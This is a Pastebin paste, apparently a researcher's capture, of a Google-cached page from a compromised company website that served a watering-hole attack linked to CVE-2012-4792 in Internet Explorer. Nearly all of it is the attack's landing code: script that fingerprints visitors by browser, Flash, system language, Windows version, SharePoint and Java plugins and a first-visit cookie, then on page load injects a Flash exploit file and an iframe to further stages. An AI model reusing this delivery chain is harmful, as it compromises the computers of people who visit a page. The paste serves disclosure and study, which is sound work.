Advertisement
eromang

capstoneturbine.com CVE-2012-4792

Jan 1st, 2013
2,183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  3. <base href="http://www.capstoneturbine.com/_include/config.html"><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google&#39;s cache of <a href="http://www.capstoneturbine.com/_include/config.html" style="text-decoration:underline;color:#00c">http://www.capstoneturbine.com/_include/config.html</a>. It is a snapshot of the page as it appeared on 18 Dec 2012 16:10:40 GMT. The <a href="http://www.capstoneturbine.com/_include/config.html" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:9Na-PeIEuBsJ:www.capstoneturbine.com/_include/config.html&amp;hl=en&amp;tbo=d&amp;gl=lu&strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div>
  4. <div>&nbsp;</div></div></div><div style="position:relative">
  5. <html>
  6. <head>
  7. <script src=deployJava.js></script>
  8. <script type="text/javascript">
  9. function getCookieVal (offset)
  10. {
  11.     var endstr = document.cookie.indexOf (";", offset);
  12.     if (endstr == -1)
  13.     {
  14.         endstr = document.cookie.length;
  15.     }
  16.     return unescape(document.cookie.substring(offset, endstr));
  17. }
  18. function GetCookie (name)
  19. {
  20.     var arg = name + "=";
  21.     var alen = arg.length;
  22.     var clen = document.cookie.length;
  23.     var i = 0;
  24.     while (i < clen)
  25.        {
  26.        var j = i + alen;
  27.        if (document.cookie.substring(i, j) == arg)
  28.           return getCookieVal (j);
  29.        i = document.cookie.indexOf(" ", i) + 1;
  30.        if (i == 0)
  31.           break;
  32.        }
  33.     return null;
  34.     }
  35. function SetCookie (name, value)
  36. {
  37.     var argv = SetCookie.arguments;
  38.     var argc = SetCookie.arguments.length;
  39.     var expires = (2 < argc) ? argv[2] : null;
  40.     var path = (3 < argc) ? argv[3] : null;
  41.     var domain = (4 < argc) ? argv[4] : null;
  42.     var secure = (5 < argc) ? argv[5] : false;
  43.     document.cookie = name + "=" + escape (value) +
  44.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  45.       ((path == null) ? "" : ("; path=" + path)) +
  46.       ((domain == null) ? "" : ("; domain=" + domain)) +
  47.          ((secure == true) ? "; secure" : "");
  48. }
  49. function DisplayInfo()
  50. {
  51.     var expdate = new Date();
  52.     var visit;
  53.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  54.     if(!(visit = GetCookie("visit")))
  55.     visit = 0;
  56.     visit++;
  57.     SetCookie("visit", visit, expdate, "/", null, false);
  58.     return visit;
  59. }
  60. var ua = window.navigator.userAgent.toLowerCase();
  61.  
  62. if (ua.indexOf('msie 8.0') <0)
  63. {
  64.     location.href="about:blank";
  65. }
  66.  
  67.     var f = 0;
  68.     try {
  69.         f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  70.     }
  71.     catch (e) {
  72.     }
  73.     var g=typeof f;
  74.  
  75.     if(g!="object")
  76.     {
  77.         location.href="about:blank";
  78.     }
  79.     var h=navigator.systemLanguage.toLowerCase();
  80.    
  81.     if(h!="zh-cn" && h!="en-us" && h!= "zh-tw")
  82.     {
  83.  
  84.         location.href="about:blank";
  85.     }
  86.  
  87. var num=DisplayInfo();
  88. if(num >1)
  89. {
  90.     location.href="about:blank";
  91. }
  92. function download()
  93. {  
  94.     var xmlhttp;
  95.       try
  96.       {
  97.         xmlhttp = new XMLHttpRequest();
  98.       }
  99.       catch (e)
  100.       {
  101.         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  102.         var success = false;
  103.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  104.         {
  105.           try
  106.           {
  107.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  108.              success = true;
  109.           } catch (e)
  110.           {}
  111.         }
  112.      }
  113.     function callback()
  114.     {
  115.         if(xmlhttp.readyState==4)
  116.         {
  117.             if(xmlhttp.status==200)
  118.             {
  119.                 var temp=ua.replace(/ /g,"");
  120.                 if (temp.indexOf("nt6.1")>-1) {
  121.                
  122.                
  123.                     var key = "";
  124.                     var ma = 0;
  125.                     try {
  126.                         ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  127.                     }
  128.                     catch (e) {
  129.                     }
  130.                     var mb = 0;
  131.                     try {
  132.                         mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  133.                     }
  134.                     catch (e) {
  135.                     }
  136.                    
  137.                     if ((typeof ma) == "object" && (typeof mb) == "object") {
  138.                         key = "girl";  
  139.                     }
  140.                     else if ((typeof ma) == "number" && (typeof mb) == "object") {
  141.                         key = "boy";    
  142.                     }
  143.                    
  144.                    
  145.                     if (key == "girl") {    
  146.            
  147.                         document.getElementById('test').innerHTML="true";  
  148.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  149.                        
  150.                     }
  151.                     if (key == "boy") {    
  152.                     document.getElementById('test').innerHTML="false";
  153.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  154.                        
  155.                     }
  156.                    
  157.                     if (key == "") {
  158.                         if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  159.                        
  160.                            
  161.                             document.getElementById('test').innerHTML="default";
  162.                             document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  163.                            
  164.                         }
  165.                     }
  166.                 }
  167.                 if(temp.indexOf("nt5.1")>-1)
  168.                 {
  169.                
  170.                     document.getElementById('test').innerHTML="cat";
  171.                     document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  172.                            
  173.                 }  
  174.                
  175.            
  176.             }
  177.         }
  178.     }
  179.     xmlhttp.open("get", "xsainfo.jpg", true);  
  180.     xmlhttp.onreadystatechange = callback;
  181.     xmlhttp.send(null);
  182. }
  183.  
  184. </script>
  185. </head>
  186. <body onload="download()">
  187. <div id=test>hello</div>
  188. </body>
  189. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement